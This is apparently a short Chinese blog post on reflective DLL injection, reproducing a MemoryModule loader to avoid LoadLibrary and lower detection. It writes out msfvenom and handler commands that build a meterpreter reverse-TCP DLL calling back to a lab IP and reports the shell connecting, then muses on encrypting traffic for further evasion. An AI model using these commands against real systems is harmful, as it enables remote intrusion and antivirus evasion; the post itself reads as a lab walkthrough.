关于反射型DLL注入

首先我们做一个简单的弹框dll,利用LoadLibrary这个API来加载DLL文件

关于反射型DLL注入

 

 我们的反射型注入,既是不需要利用LoadLibrary这个API来完成DLL的装载,dll可来自网络,拦截率低,网上有很多反射型注入的教程,比如sRDI反射型dll注入,还有倾旋师傅的MemoryModule,接下来我就复现一下倾旋师傅的MemoryModule,现在我们新建一个MemoryModule的项目,发现用MemoryModule加载成功

关于反射型DLL注入

 

 接下来我们启动我们的msf,生成恶意的dll,msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.149.145 LPORT=8899 -f dll -o axgg.dll

关于反射型DLL注入

 

 先将我们的dll挂上,handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.149.145 -P 8899

在设置我们的payload

关于反射型DLL注入

 然后我们的meterpreter反弹回来了

关于反射型DLL注入

 

 一些思考:我们对于代码层的改变已经到此,对于流量层的加密是否还有跟进一步的提升呢?

上一篇:70-100 C# winform helloworld


下一篇:(70)C#里怎么样在注册表里创建子键和获取键值